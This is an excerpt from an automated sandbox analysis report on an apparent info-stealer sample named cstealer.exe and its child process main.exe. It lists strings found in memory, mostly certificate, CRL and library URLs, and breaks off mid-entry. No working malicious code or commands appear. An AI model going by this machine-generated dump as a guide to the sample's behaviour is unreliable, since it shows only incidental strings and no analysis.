cstealer.exe, 00000002.00000003.2161715742.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161490405.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167928555.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187745990.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2189591439.000002004DDFF000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187611110.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187521128.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2189188188.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                                Source: cstealer.exe, 00000002.00000003.2164160574.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2191097529.0000014E6F9D4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertS
                                Source: cstealer.exe, 00000002.00000003.2164160574.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2191097529.0000014E6F9D4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                                Source: cstealer.exe, 00000002.00000003.2164160574.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2191097529.0000014E6F9D4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                                Source: cstealer.exe, 00000007.00000003.2191097529.0000014E6F9D4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertSO
                                Source: cstealer.exe, 00000002.00000003.2167396035.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161168267.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161792548.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2162061027.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161917908.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161593775.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2163418436.0000024728B9E000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164299642.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161319049.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161069601.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167136670.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164969586.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161715742.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161490405.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167928555.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187745990.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187611110.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187521128.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2189188188.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2188809634.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2226157395.000002004DDFF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                                Source: cstealer.exe, 00000002.00000003.2167396035.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161168267.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161792548.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2162061027.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161917908.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161593775.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2163418436.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164299642.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161319049.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161069601.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167136670.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164969586.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161715742.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161490405.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167928555.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187745990.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187611110.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187521128.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2189188188.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2188809634.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187842402.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                                Source: cstealer.exe, 00000002.00000003.2167396035.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161168267.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161792548.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2162061027.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161917908.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161593775.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2163418436.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2163418436.0000024728B9E000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164299642.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161319049.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167928555.0000024728BA0000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161069601.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167136670.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164969586.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161715742.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161490405.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167928555.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187745990.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2189591439.000002004DDFF000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187611110.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187521128.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                                Source: cstealer.exe, 00000002.00000003.2167396035.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161168267.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161792548.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2162061027.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161917908.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161593775.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2163418436.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164299642.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161319049.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167928555.0000024728BA0000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161069601.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167136670.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164969586.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161715742.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161490405.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167928555.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187745990.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2189591439.000002004DDFF000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187611110.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187521128.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2189188188.000002004DDF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                                Source: cstealer.exe, 00000002.00000003.2164160574.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2191097529.0000014E6F9D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                                Source: cstealer.exe, 00000002.00000003.2164160574.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2191097529.0000014E6F9D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                                Source: cstealer.exe, 00000002.00000003.2167396035.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161168267.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161792548.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2162061027.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161917908.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161593775.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2163418436.0000024728B9E000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164299642.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161319049.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167928555.0000024728BA0000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161069601.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167136670.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164969586.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161715742.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161490405.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167928555.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187745990.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187611110.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187521128.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2189188188.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2188809634.000002004DDF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                                Source: cstealer.exe, 00000002.00000003.2167396035.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161168267.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161792548.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2162061027.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161917908.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161593775.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2163418436.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164299642.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161319049.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161069601.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167136670.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164969586.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161715742.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161490405.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167928555.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187745990.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187611110.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187521128.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2189188188.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2188809634.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187842402.000002004DDF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                                Source: cstealer.exe, 00000049.00000003.2467259696.000001DB63733000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                                Source: cstealer.exe, 00000002.00000003.2164160574.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2191097529.0000014E6F9D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                                Source: cstealer.exe, 00000002.00000003.2164160574.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2191097529.0000014E6F9D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                                Source: cstealer.exe, 00000002.00000003.2164160574.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2191097529.0000014E6F9D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                                Source: cstealer.exe, 00000002.00000003.2167396035.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161168267.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161792548.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2162061027.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161917908.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161593775.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2163418436.0000024728B9E000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164299642.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161319049.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167928555.0000024728BA0000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161069601.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167136670.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164969586.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161715742.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161490405.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167928555.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187745990.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187611110.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187521128.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2189188188.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2188809634.000002004DDF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                                Source: cstealer.exe, 00000002.00000003.2164160574.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2191097529.0000014E6F9D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                                Source: cstealer.exe, 00000002.00000003.2164160574.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2191097529.0000014E6F9D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                                Source: cstealer.exe, 00000003.00000003.2447371175.00000271DA548000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2396655837.00000271DA542000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2455332650.00000271D9E2D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2542350232.00000271D9E45000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2470513280.00000271D9E3D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2552117911.00000271D9E57000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2443600130.00000271DA542000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2285480020.0000020103095000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2289769718.00000201030A0000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2276614060.0000020103094000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2287958996.0000020103095000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2276235445.000002010308A000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2289172640.0000020103097000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
                                Source: cstealer.exe, 00000003.00000002.2700205546.00000271DA8A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2177844870.00000271DA4D6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2386235093.0000020103570000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2217808109.0000020103199000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://curl.haxx.se/rfc/cookie_spec.html
                                Source: cstealer.exe, 00000003.00000003.2527962136.00000271DA17F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2537885870.00000271DA18C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2473409999.00000271DA17D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2519598138.00000271DA17E000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2537371997.00000271DA185000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2177398207.00000271DA184000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2501756441.00000271DA17D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2179117059.00000271DA183000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2176664163.00000271DA486000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2183488711.00000271DA183000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2215320232.0000020102DEC000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2287998421.0000020102DFD000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218139223.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2221688107.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290930130.0000020102DFF000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219861394.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2287046856.0000020102DD2000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2220789143.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2282192132.0000020102DD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
                                Source: cstealer.exe, 00000003.00000003.2176699163.00000271DA3F4000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2473981755.00000271DA3BD000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2176699163.00000271DA3BF000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2682223579.00000271DA3C8000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2475194270.00000271DA3C2000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2281174075.0000020102D30000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2289034063.0000020102D34000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2288580878.0000020102D33000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2325946516.0000020102D44000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
                                Source: cstealer.exe, 00000003.00000003.2536067698.00000271DA060000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2454347629.00000271D9E5F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2627252924.00000271D9E66000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2178442107.00000271D9E64000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2650778065.00000271DA063000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2542654022.00000271D9E65000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2407518867.00000271D9E5D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2534726372.00000271D9E5F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2177316384.00000271D9E57000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2274584655.0000020102A87000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275350544.0000020102A8B000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2314389620.0000020102AA0000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2278980759.0000020102A97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
                                Source: cstealer.exe, 00000009.00000003.2276235445.000002010308A000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2351020325.00000201030B8000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2314389620.0000020102AA0000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290986638.00000201030B8000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2286765281.000002010308C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2278980759.0000020102A97000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280491817.00000201030B6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2284549098.000002010308B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://json.org
                                Source: cstealer.exe, 00000002.00000003.2167396035.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161168267.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161792548.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2162061027.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161917908.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161593775.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2163418436.0000024728B9E000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164299642.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161319049.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161069601.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167136670.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164969586.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161715742.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161490405.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167928555.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187745990.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187611110.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 